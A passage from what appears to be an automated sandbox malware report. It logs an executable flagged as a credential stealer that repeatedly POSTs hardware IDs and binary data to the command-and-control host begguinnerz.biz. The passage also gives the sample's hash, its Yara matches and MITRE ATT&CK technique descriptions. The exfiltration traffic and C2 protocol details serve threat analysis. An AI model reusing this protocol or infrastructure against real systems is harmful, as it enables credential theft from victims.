QTi9AZXtz5/JwOusoUJM32ML4tzRDiLMY+6ULslH/YxXOPxC362H3NvS7MrPNxmNMUqimcEPFbpUkPJphAnhyxlp+w+NsMGH9JHjtM5eV5JwBPK7zU41i2O/gVuJAO7aH2+0DuOJoJ+Dka20qUJZyjRN8taeEmDZJvmcLphJ9owZOOMTg/+Tn5WR7PfjAhGJJl/1sPBnNYt0uNxxiybs3QVGhVTOsY/Y28DrurEfV9IJHPrO8Q57lDX2jEmECeH
2025-01-01 15:55:05 UTC	1369	IN	Data Raw: 6b 4c 64 75 4c 2f 68 34 4d 4f 73 35 50 4a 53 4f 34 30 39 55 49 79 77 2b 56 45 38 6e 44 65 49 7a 32 71 45 52 36 47 4d 46 7a 6a 6a 41 65 43 74 68 73 2f 4f 6b 34 66 7a 2f 42 78 58 6c 58 35 46 38 70 69 4f 47 47 6a 43 4e 62 79 4d 4a 4d 64 41 37 4e 34 64 66 72 68 58 7a 76 69 2f 34 65 44 44 72 4f 54 79 55 69 61 48 4e 45 71 6e 6a 64 35 48 42 62 4a 59 76 4d 74 73 68 45 58 4b 39 6b 31 4a 72 55 4c 4e 73 59 61 66 67 35 47 7a 74 4b 6c 51 4f 70 67 33 54 4c 48 4d 36 33 70 35 76 57 4f 74 7a 48 4b 41 52 36 47 4d 41 7a 6a 6a 41 63 43 74 68 73 2f 4f 6e 61 7a 75 39 6c 41 49 78 43 6b 63 70 4d 36 57 45 33 58 4d 5a 2b 36 55 50 4d 41 4a 34 73 30 4d 64 72 68 54 33 37 6d 43 79 63 36 57 6c 63 72 65 47 78 61 61 50 55 32 2f 69 74 68 2b 42 61 74 7a 71 38 74 43 75 54 44 2b 79 78 38 36 Data Ascii: kLduL/h4MOs5PJSO409UIyw+VE8nDeIz2qER6GMFzjjAeCths/Ok4fz/BxXlX5F8piOGGjCNbyMJMdA7N4dfrhXzvi/4eDDrOTyUiaHNEqnjd5HBbJYvMtshEXK9k1JrULNsYafg5GztKlQOpg3TLHM63p5vWOtzHKAR6GMAzjjAcCths/Onazu9lAIxCkcpM6WE3XMZ+6UPMAJ4s0MdrhT37mCyc6WlcreGxaaPU2/ith+Batzq8tCuTD+yx86

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49973	104.21.92.91	443	2436	C:\Users\user\Desktop\yTcaknrrb8.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 15:55:06 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=Y44N968MN09AJ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12821 Host: begguinnerz.biz
2025-01-01 15:55:06 UTC	12821	OUT	Data Raw: 2d 2d 59 34 34 4e 39 36 38 4d 4e 30 39 41 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 30 32 45 41 44 31 33 39 41 41 42 31 46 46 31 33 38 41 43 44 44 45 31 34 38 46 39 37 42 33 32 0d 0a 2d 2d 59 34 34 4e 39 36 38 4d 4e 30 39 41 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 34 34 4e 39 36 38 4d 4e 30 39 41 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 64 64 36 64 33 33 63 66 65 30 61 30 0d 0a 2d 2d 59 34 34 4e Data Ascii: --Y44N968MN09AJContent-Disposition: form-data; name="hwid"F02EAD139AAB1FF138ACDDE148F97B32--Y44N968MN09AJContent-Disposition: form-data; name="pid"2--Y44N968MN09AJContent-Disposition: form-data; name="lid"HpOoIh--dd6d33cfe0a0--Y44N
2025-01-01 15:55:06 UTC	1126	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 15:55:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=h9k2vqui4jkkvu86ddc0filat8; expires=Sun, 27 Apr 2025 09:41:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NsnbIs8ob1rwa%2BRN97gUk6Yl4%2BL8nNGZHPV7MFevlw5NLxh8uQ702edOradCs0pQYLTyTKxkWCk6gZyL7l19GqUbL0gsgUVsk%2BYJFeB7e0lAfbdEHn3i5WaDDVaMxumMyLY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb3b114086d431c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1711&min_rtt=1703&rtt_var=656&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2839&recv_bytes=13755&delivery_rate=1647855&cwnd=237&unsent_bytes=0&cid=e9bc317eb5fd26f8&ts=536&x=0"
2025-01-01 15:55:06 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-01 15:55:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49974	104.21.92.91	443	2436	C:\Users\user\Desktop\yTcaknrrb8.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 15:55:07 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=6HVU4IH9QFJAK User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15053 Host: begguinnerz.biz
2025-01-01 15:55:07 UTC	15053	OUT	Data Raw: 2d 2d 36 48 56 55 34 49 48 39 51 46 4a 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 30 32 45 41 44 31 33 39 41 41 42 31 46 46 31 33 38 41 43 44 44 45 31 34 38 46 39 37 42 33 32 0d 0a 2d 2d 36 48 56 55 34 49 48 39 51 46 4a 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 48 56 55 34 49 48 39 51 46 4a 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 64 64 36 64 33 33 63 66 65 30 61 30 0d 0a 2d 2d 36 48 56 55 Data Ascii: --6HVU4IH9QFJAKContent-Disposition: form-data; name="hwid"F02EAD139AAB1FF138ACDDE148F97B32--6HVU4IH9QFJAKContent-Disposition: form-data; name="pid"2--6HVU4IH9QFJAKContent-Disposition: form-data; name="lid"HpOoIh--dd6d33cfe0a0--6HVU
2025-01-01 15:55:08 UTC	1127	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 15:55:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=lk7mmh9fe8988pehds57fkjkor; expires=Sun, 27 Apr 2025 09:41:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fkxHWTGUVvyVH6nu5hoUjrAVfUKtlmkoGenGJJH9O7GXLabj8Cnuw7nXmzAmEQsd3OuWn%2Fbqw%2F2m8rhj9hnlH2lR164k4ps8obHlx6%2FihMxk7jJWx0x3oQukWA2uXkarKxY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb3b11b1c454316-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1704&min_rtt=1704&rtt_var=640&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2838&recv_bytes=15987&delivery_rate=1708601&cwnd=177&unsent_bytes=0&cid=46ec5eca141c1651&ts=853&x=0"
2025-01-01 15:55:08 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-01 15:55:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49975	104.21.92.91	443	2436	C:\Users\user\Desktop\yTcaknrrb8.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 15:55:08 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=CZVFW84DU08ST1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20384 Host: begguinnerz.biz
2025-01-01 15:55:08 UTC	15331	OUT	Data Raw: 2d 2d 43 5a 56 46 57 38 34 44 55 30 38 53 54 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 30 32 45 41 44 31 33 39 41 41 42 31 46 46 31 33 38 41 43 44 44 45 31 34 38 46 39 37 42 33 32 0d 0a 2d 2d 43 5a 56 46 57 38 34 44 55 30 38 53 54 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 43 5a 56 46 57 38 34 44 55 30 38 53 54 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 64 64 36 64 33 33 63 66 65 30 61 30 0d 0a 2d 2d 43 Data Ascii: --CZVFW84DU08ST1Content-Disposition: form-data; name="hwid"F02EAD139AAB1FF138ACDDE148F97B32--CZVFW84DU08ST1Content-Disposition: form-data; name="pid"3--CZVFW84DU08ST1Content-Disposition: form-data; name="lid"HpOoIh--dd6d33cfe0a0--C
2025-01-01 15:55:08 UTC	5053	OUT	Data Raw: fe 28 58 da f6 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 Data Ascii: (X6K~`iO\_,mi`m?ls}Qm/X2x)
2025-01-01 15:55:09 UTC	1131	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 15:55:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=56dr4ntqkq4edo89ll11qfph17; expires=Sun, 27 Apr 2025 09:41:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8fiNG9ktEuOwDTmwVUjiMAZA4JC1sD1fxH7LqKKm8eerW5L%2F3s%2BI3%2BRjTNCyqlxCNd11KRk%2BrMHuee4p8em4GdBQlvsrD8eS9OCdjyu%2BnbjodXoGwFj1mB7PfBkfToW1gz0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb3b1246c9a32dc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2007&min_rtt=1996&rtt_var=772&sent=12&recv=26&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21341&delivery_rate=1396461&cwnd=241&unsent_bytes=0&cid=ec5911a6afa668de&ts=624&x=0"
2025-01-01 15:55:09 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-01 15:55:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49976	104.21.92.91	443	2436	C:\Users\user\Desktop\yTcaknrrb8.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 15:55:10 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=86Q6J6TMF3ERJ69 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1211 Host: begguinnerz.biz
2025-01-01 15:55:10 UTC	1211	OUT	Data Raw: 2d 2d 38 36 51 36 4a 36 54 4d 46 33 45 52 4a 36 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 30 32 45 41 44 31 33 39 41 41 42 31 46 46 31 33 38 41 43 44 44 45 31 34 38 46 39 37 42 33 32 0d 0a 2d 2d 38 36 51 36 4a 36 54 4d 46 33 45 52 4a 36 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 36 51 36 4a 36 54 4d 46 33 45 52 4a 36 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 64 64 36 64 33 33 63 66 65 30 61 30 0d 0a Data Ascii: --86Q6J6TMF3ERJ69Content-Disposition: form-data; name="hwid"F02EAD139AAB1FF138ACDDE148F97B32--86Q6J6TMF3ERJ69Content-Disposition: form-data; name="pid"1--86Q6J6TMF3ERJ69Content-Disposition: form-data; name="lid"HpOoIh--dd6d33cfe0a0
2025-01-01 15:55:10 UTC	1126	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 15:55:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=s76h1d26u2tr1d3snic0jj79mk; expires=Sun, 27 Apr 2025 09:41:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3RyVnk5Xgt7qtltRVme1tU5g8%2FVcxdTh%2B1fDm3C7ItMYQQlNtHbjRmlHRO4wglZZor8w4MX%2BvppMKmMLap%2BS6q6LNowumk2PIzamTYNbidhX71SbnbjvIH5qhm2A5mvazw0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb3b12e7bc04414-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2183&min_rtt=2181&rtt_var=822&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2124&delivery_rate=1327876&cwnd=172&unsent_bytes=0&cid=800d429792a0a95c&ts=456&x=0"
2025-01-01 15:55:10 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-01 15:55:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49977	104.21.92.91	443	2436	C:\Users\user\Desktop\yTcaknrrb8.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 15:55:11 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=9N0X5D913B6X79R1K User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1114 Host: begguinnerz.biz
2025-01-01 15:55:11 UTC	1114	OUT	Data Raw: 2d 2d 39 4e 30 58 35 44 39 31 33 42 36 58 37 39 52 31 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 30 32 45 41 44 31 33 39 41 41 42 31 46 46 31 33 38 41 43 44 44 45 31 34 38 46 39 37 42 33 32 0d 0a 2d 2d 39 4e 30 58 35 44 39 31 33 42 36 58 37 39 52 31 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 4e 30 58 35 44 39 31 33 42 36 58 37 39 52 31 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 64 64 36 64 33 33 63 66 Data Ascii: --9N0X5D913B6X79R1KContent-Disposition: form-data; name="hwid"F02EAD139AAB1FF138ACDDE148F97B32--9N0X5D913B6X79R1KContent-Disposition: form-data; name="pid"1--9N0X5D913B6X79R1KContent-Disposition: form-data; name="lid"HpOoIh--dd6d33cf
2025-01-01 15:55:12 UTC	1124	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 15:55:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rnc37c7flk678bvkuh57r5d89t; expires=Sun, 27 Apr 2025 09:41:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w93ctIgK9NhKxqQvekVUuDBl8zTBRy%2FOJxijTvzUidTfdSLYzEUhG7NsIt1SmGYPdbzA%2FUW7KslTvU1gMqaNNNp9vNLW9gXlqw1d6%2BpTfUXfLoL7oxrqJjx52v71X7NxZDQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb3b1351e2c4388-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1726&min_rtt=1724&rtt_var=652&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2029&delivery_rate=1671436&cwnd=221&unsent_bytes=0&cid=0c732f83703fea53&ts=770&x=0"
2025-01-01 15:55:12 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-01 15:55:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49978	104.21.92.91	443	2436	C:\Users\user\Desktop\yTcaknrrb8.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 15:55:12 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 121 Host: begguinnerz.biz
2025-01-01 15:55:12 UTC	121	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 64 64 36 64 33 33 63 66 65 30 61 30 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 46 30 32 45 41 44 31 33 39 41 41 42 31 46 46 31 33 38 41 43 44 44 45 31 34 38 46 39 37 42 33 32 Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--dd6d33cfe0a0&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=F02EAD139AAB1FF138ACDDE148F97B32
2025-01-01 15:55:13 UTC	1130	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 15:55:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rvog1f91llct97som2vj8knp00; expires=Sun, 27 Apr 2025 09:41:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dZFj1kWlZBQHgmiCsUMpPMJs9lt9XGQkM3e2hxOSpHa6Iala%2BBvQUbAK0waRAFErcnFTm%2BvV3DFjYXnGz%2F3TgeS4q%2FgKVOhBw7uEC2JmaIASoJX%2Fh2t2nd9nc9TUc5Oc%2BUM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb3b13d6ab6f795-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1546&min_rtt=1497&rtt_var=596&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1021&delivery_rate=1950567&cwnd=187&unsent_bytes=0&cid=0de35018f12af3f8&ts=435&x=0"
2025-01-01 15:55:13 UTC	54	IN	Data Raw: 33 30 0d 0a 63 30 35 6d 41 4b 57 72 66 37 44 6c 48 46 56 39 39 77 4c 59 79 59 46 2b 65 48 75 7a 6f 71 55 6a 6a 7a 72 47 6b 35 4e 6b 67 75 34 6f 45 77 3d 3d 0d 0a Data Ascii: 30c05mAKWrf7DlHFV99wLYyYF+eHuzoqUjjzrGk5Nkgu4oEw==
2025-01-01 15:55:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	10:52:04
Start date:	01/01/2025
Path:	C:\Users\user\Desktop\yTcaknrrb8.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\yTcaknrrb8.exe"
Imagebase:	0xec0000
File size:	2'954'240 bytes
MD5 hash:	617E7BF260AA05530B1470C129A4A164
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3079776447.0000000001D3F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3103534019.0000000001D42000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3090277095.0000000001D3F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3079860899.0000000001CF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3079992709.0000000001CF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

